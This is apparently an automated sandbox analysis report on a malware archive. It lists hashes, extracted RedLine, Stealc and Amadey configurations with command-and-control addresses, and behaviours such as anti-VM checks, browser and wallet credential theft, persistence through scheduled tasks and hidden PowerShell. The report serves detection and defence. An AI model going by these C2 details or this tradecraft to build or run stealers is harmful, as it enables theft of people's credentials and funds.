Analysis
max time kernel: 2699s
max time network: 2693s
platform: windows11-21h2_x64
resource: win11-20240709-en
resource tags: arch:x64, arch:x86, image:win11-20240709-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 12/07/2024, 23:32
Static task: static1
Behavioral task: behavioral1
  Sample: archive.zip
  Resource: win10v2004-20240709-en
Behavioral task: behavioral2
  Sample: archive.zip
  Resource: win11-20240709-en
General
Target: archive.zip
Size: 14.0MB
MD5: aa3be7accc9a612ce95fcede2a64d791
SHA1: 76bab53214bef8715658e47a01e14b9efc91cea9
SHA256: d5414ed0d1cdcdd945185b89689fc3436c9e81663b35f0df890eeed3a2b6d4a4
SHA512: dc232e6a0588161bd4b5decd3311a3ad1b5e58f723fa8ae7065ee3fa538fd432f4ef8bb857a3be372da97e62c49584041b94a4219ef8eae954491e963f09ecb4
SSDEEP: 393216:WxovLlzWh46e8jm2KaxKhHK2VKaiKdWKn9KK:aov5246e8jjKaxKhHK2VKaiKdWKn9KK
Malware Config
Extracted: redline
  LogsDiller Cloud (TG: @logsdillabot)
  77.105.135.107:3445
Extracted: stealc
  hate
  http://85.28.47.30
  url_path: /920475a59bac849d.php
Extracted: amadey
  4.30
  4dd39d
  http://77.91.77.82
  install_dir: ad40971b6b
  install_file: explorti.exe
  strings_key: a434973ad22def7137dbb5e059b7081e
  url_paths: /Hun4Ko/index.php
Signatures
Modifies firewall policy service (3 TTPs, 3 IoCs)
  description | ioc | Process
  Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | Setup.exe
  Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | Setup.exe
  Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | Setup.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine payload (1 IoCs)
  resource | yara_rule
  behavioral2/memory/4468-251-0x0000000000400000-0x0000000000450000-memory.dmp | family_redline
Identifies VirtualBox via ACPI registry values, likely anti-VM (2 TTPs, 42 IoCs)
Blocklisted process makes network request (1 IoCs)
  flow | pid | Process
  289 | 5252 | rundll32.exe
Command and Scripting Interpreter: PowerShell (1 TTPs, 6 IoCs)
Runs PowerShell with the display window hidden.
  pid | Process
  236 | powershell.exe
  5532 | powershell.EXE
  5844 | powershell.EXE
  4768 | powershell.exe
  5872 | powershell.exe
  4208 | powershell.exe
Creates new service(s) (2 TTPs)
Downloads MZ/PE file
Checks BIOS information in registry (2 TTPs, 64 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up the country code configured in the registry, likely for geofencing.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Control Panel\International\Geo\Nation | OklvlTo.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Control Panel\International\Geo\Nation | AXChDNl.exe
Executes dropped EXE (64 IoCs)
Identifies Wine through registry keys (2 TTPs, 42 IoCs)
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
Loads dropped DLL (9 IoCs)
  pid | Process
  200 | Klk_ndJuZUINtD72UfY7IaBv.tmp
  4528 | QwpLixYOI92BLmCZFEhE6Mbs.exe
  4528 | QwpLixYOI92BLmCZFEhE6Mbs.exe
  3656 | MSBuild.exe
  3656 | MSBuild.exe
  2124 | MSBuild.exe
  2124 | MSBuild.exe
  5252 | rundll32.exe
  1784 | av_cOAXWNrelQa039CGbm0A1.tmp
Reads data files stored by FTP clients (2 TTPs)
Tries to access configuration files associated with programs like FileZilla.
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Unexpected DNS network traffic destination (1 IoCs)
Network traffic to servers other than the configured DNS servers was detected on the DNS port.
  description | ioc
  Destination IP | 141.98.234.31
Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.
Drops Chrome extension (3 IoCs)
  description | ioc | Process
  File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | OklvlTo.exe
  File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | OklvlTo.exe
  File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json | AXChDNl.exe
Drops desktop.ini file(s) (1 IoCs)
  description | ioc | Process
  File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | OklvlTo.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 4 IoCs)
  flow | ioc
  50 | iplogger.org
  65 | iplogger.org
  297 | iplogger.org
  387 | iplogger.org
Looks up external IP address via web service (10 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  8 | api.myip.com
  9 | api.myip.com
  10 | ipinfo.io
  298 | api.myip.com
  320 | ipinfo.io
  346 | api.myip.com
  347 | ipinfo.io
  2 | ipinfo.io
  431 | api.myip.com
  432 | ipinfo.io
Power Settings (1 TTPs, 16 IoCs)
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
AutoIT Executable (1 IoCs)
AutoIT scripts compiled to PE executables.
  resource | yara_rule
  behavioral2/files/0x000100000002aa7e-725.dat | autoit_exe
Drops file in System32 directory (47 IoCs)
Suspicious use of NtSetInformationThreadHideFromDebugger (48 IoCs)
Suspicious use of SetThreadContext (14 IoCs)
Drops file in Program Files directory (26 IoCs)
Drops file in Windows directory (8 IoCs)
  description | ioc | Process
  File created | C:\Windows\Tasks\fxxmGIjnSbKlnnNZc.job | schtasks.exe
  File created | C:\Windows\Tasks\ZNzITvxeQRflwsDJD.job | schtasks.exe
  File created | C:\Windows\Tasks\JHXYugTugXnbcjp.job | schtasks.exe
  File created | C:\Windows\Tasks\bIOEZkRAagKtMyjtNl.job | schtasks.exe
  File created | C:\Windows\Tasks\beIeSqxTUIgkrqSZzo.job | schtasks.exe
  File created | C:\Windows\Tasks\explorti.job | JJECAAEHCF.exe
  File created | C:\Windows\Tasks\LOHPKuWKJcOzSYPZu.job | schtasks.exe
  File created | C:\Windows\Tasks\ayCOowYLgjutNKI.job | schtasks.exe
Launches sc.exe (6 IoCs)
Sc.exe is a Windows utility to control services on the system.
  pid | Process
  5480 | sc.exe
  4288 | sc.exe
  4880 | sc.exe
  3416 | sc.exe
  3996 | sc.exe
  2348 | sc.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Program crash (6 IoCs)
  pid | pid_target | Process | procid_target
  5456 | 5204 | WerFault.exe | 180
  2008 | 5180 | WerFault.exe | 179
  2364 | 5104 | WerFault.exe | 111
  664 | 6072 | WerFault.exe | 263
  2284 | 1492 | WerFault.exe | 112
  2044 | 648 | WerFault.exe | 360
Checks processor information in registry 2 TTPs 36 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried 
\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 QwpLixYOI92BLmCZFEhE6Mbs.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString QwpLixYOI92BLmCZFEhE6Mbs.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 3600 timeout.exe 1984 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" OklvlTo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" AXChDNl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created 
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created 
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" OklvlTo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" AXChDNl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople 
powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b1167767-0000-0000-0000-d01200000000}\MaxCapacity = "14116" OklvlTo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" AXChDNl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 21 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5224 schtasks.exe 3656 schtasks.exe 4972 schtasks.exe 4092 schtasks.exe 1072 schtasks.exe 4552 schtasks.exe 2252 schtasks.exe 3552 schtasks.exe 5152 schtasks.exe 3156 schtasks.exe 5292 schtasks.exe 5568 schtasks.exe 1212 schtasks.exe 1156 schtasks.exe 1376 schtasks.exe 2640 schtasks.exe 5996 schtasks.exe 2304 schtasks.exe 2036 schtasks.exe 5216 schtasks.exe 560 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1184 Setup.exe 1184 Setup.exe 1784 Setup.exe 1784 Setup.exe 1916 cFb2c7uKqYcOaECU8XsTAIef.exe 1916 cFb2c7uKqYcOaECU8XsTAIef.exe 1916 cFb2c7uKqYcOaECU8XsTAIef.exe 1916 cFb2c7uKqYcOaECU8XsTAIef.exe 1916 cFb2c7uKqYcOaECU8XsTAIef.exe 1916 cFb2c7uKqYcOaECU8XsTAIef.exe 4528 QwpLixYOI92BLmCZFEhE6Mbs.exe 4528 QwpLixYOI92BLmCZFEhE6Mbs.exe 3980 KAIgHVGHtDFBzfjGkrU7kU8s.exe 3980 KAIgHVGHtDFBzfjGkrU7kU8s.exe 3656 MSBuild.exe 3656 MSBuild.exe 4208 powershell.exe 772 RegAsm.exe 4468 RegAsm.exe 4468 RegAsm.exe 4468 RegAsm.exe 4468 RegAsm.exe 4208 powershell.exe 236 powershell.exe 236 powershell.exe 236 powershell.exe 4528 QwpLixYOI92BLmCZFEhE6Mbs.exe 4528 QwpLixYOI92BLmCZFEhE6Mbs.exe 3656 MSBuild.exe 3656 MSBuild.exe 5056 JJECAAEHCF.exe 5056 JJECAAEHCF.exe 4468 RegAsm.exe 4208 explorti.exe 4208 explorti.exe 3980 KAIgHVGHtDFBzfjGkrU7kU8s.exe 3980 KAIgHVGHtDFBzfjGkrU7kU8s.exe 3980 KAIgHVGHtDFBzfjGkrU7kU8s.exe 3980 KAIgHVGHtDFBzfjGkrU7kU8s.exe 3980 KAIgHVGHtDFBzfjGkrU7kU8s.exe 3980 KAIgHVGHtDFBzfjGkrU7kU8s.exe 3980 KAIgHVGHtDFBzfjGkrU7kU8s.exe 3980 KAIgHVGHtDFBzfjGkrU7kU8s.exe 1472 eqtpkqwqodik.exe 1472 eqtpkqwqodik.exe 1472 eqtpkqwqodik.exe 1472 eqtpkqwqodik.exe 1472 eqtpkqwqodik.exe 1472 eqtpkqwqodik.exe 1472 eqtpkqwqodik.exe 1472 eqtpkqwqodik.exe 3656 MSBuild.exe 3656 MSBuild.exe 3656 MSBuild.exe 3656 MSBuild.exe 2124 MSBuild.exe 2124 MSBuild.exe 2124 MSBuild.exe 2124 MSBuild.exe 5224 explorti.exe 5224 explorti.exe 5372 powershell.exe 5372 powershell.exe 5372 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1916 cFb2c7uKqYcOaECU8XsTAIef.exe Token: SeDebugPrivilege 2324 vmr4hdyC4X94dgX9Bh3X3e0n.exe Token: SeDebugPrivilege 772 RegAsm.exe Token: SeBackupPrivilege 772 RegAsm.exe Token: SeSecurityPrivilege 772 RegAsm.exe Token: SeSecurityPrivilege 772 RegAsm.exe Token: SeSecurityPrivilege 772 RegAsm.exe Token: SeSecurityPrivilege 772 RegAsm.exe Token: SeDebugPrivilege 4208 powershell.exe Token: SeIncreaseQuotaPrivilege 1496 WMIC.exe Token: SeSecurityPrivilege 1496 WMIC.exe Token: SeTakeOwnershipPrivilege 1496 WMIC.exe Token: SeLoadDriverPrivilege 1496 WMIC.exe Token: SeSystemProfilePrivilege 1496 WMIC.exe Token: SeSystemtimePrivilege 1496 WMIC.exe Token: SeProfSingleProcessPrivilege 1496 WMIC.exe Token: SeIncBasePriorityPrivilege 1496 WMIC.exe Token: SeCreatePagefilePrivilege 1496 WMIC.exe Token: SeBackupPrivilege 1496 WMIC.exe Token: SeRestorePrivilege 1496 WMIC.exe Token: SeShutdownPrivilege 1496 WMIC.exe Token: SeDebugPrivilege 1496 WMIC.exe Token: SeSystemEnvironmentPrivilege 1496 WMIC.exe Token: SeRemoteShutdownPrivilege 1496 WMIC.exe Token: SeUndockPrivilege 1496 WMIC.exe Token: SeManageVolumePrivilege 1496 WMIC.exe Token: 33 1496 WMIC.exe Token: 34 1496 WMIC.exe Token: 35 1496 WMIC.exe Token: 36 1496 WMIC.exe Token: SeDebugPrivilege 236 powershell.exe Token: SeIncreaseQuotaPrivilege 1496 WMIC.exe Token: SeSecurityPrivilege 1496 WMIC.exe Token: SeTakeOwnershipPrivilege 1496 WMIC.exe Token: SeLoadDriverPrivilege 1496 WMIC.exe Token: SeSystemProfilePrivilege 1496 WMIC.exe Token: SeSystemtimePrivilege 1496 WMIC.exe Token: SeProfSingleProcessPrivilege 1496 WMIC.exe Token: SeIncBasePriorityPrivilege 1496 WMIC.exe Token: SeCreatePagefilePrivilege 1496 WMIC.exe Token: SeBackupPrivilege 1496 WMIC.exe Token: SeRestorePrivilege 1496 WMIC.exe Token: SeShutdownPrivilege 1496 WMIC.exe Token: SeDebugPrivilege 1496 WMIC.exe Token: SeSystemEnvironmentPrivilege 1496 WMIC.exe Token: SeRemoteShutdownPrivilege 1496 WMIC.exe Token: 
SeUndockPrivilege 1496 WMIC.exe Token: SeManageVolumePrivilege 1496 WMIC.exe Token: 33 1496 WMIC.exe Token: 34 1496 WMIC.exe Token: 35 1496 WMIC.exe Token: 36 1496 WMIC.exe Token: SeIncreaseQuotaPrivilege 4952 WMIC.exe Token: SeSecurityPrivilege 4952 WMIC.exe Token: SeTakeOwnershipPrivilege 4952 WMIC.exe Token: SeLoadDriverPrivilege 4952 WMIC.exe Token: SeSystemProfilePrivilege 4952 WMIC.exe Token: SeSystemtimePrivilege 4952 WMIC.exe Token: SeProfSingleProcessPrivilege 4952 WMIC.exe Token: SeIncBasePriorityPrivilege 4952 WMIC.exe Token: SeCreatePagefilePrivilege 4952 WMIC.exe Token: SeBackupPrivilege 4952 WMIC.exe Token: SeRestorePrivilege 4952 WMIC.exe Token: SeShutdownPrivilege 4952 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 200 Klk_ndJuZUINtD72UfY7IaBv.tmp 5056 JJECAAEHCF.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 2212 b9fcde3053.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 